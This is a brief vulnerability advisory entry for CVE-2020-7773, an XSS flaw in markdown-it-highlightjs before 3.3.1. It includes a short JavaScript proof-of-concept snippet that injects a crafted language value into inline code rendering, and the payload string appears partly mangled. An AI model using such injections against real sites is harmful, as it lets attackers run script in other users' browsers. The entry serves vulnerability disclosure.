CVEs-PoC/2020/CVE-2020-7773.md

CVE-2020-7773

Description

This affects the package markdown-it-highlightjs before 3.3.1. It is possible insert malicious JavaScript as a value of lang in the markdown-it-highlightjs Inline code highlighting feature. const markdownItHighlightjs = require("markdown-it-highlightjs"); const md = require('markdown-it'); const reuslt_xss = md() .use(markdownItHighlightjs, { inline: true }) .render('console.log(42){.">js}'); console.log(reuslt_xss);

POC

Reference

• https://snyk.io/vuln/SNYK-JS-MARKDOWNITHIGHLIGHTJS-1040461

Github

No PoCs found on GitHub currently.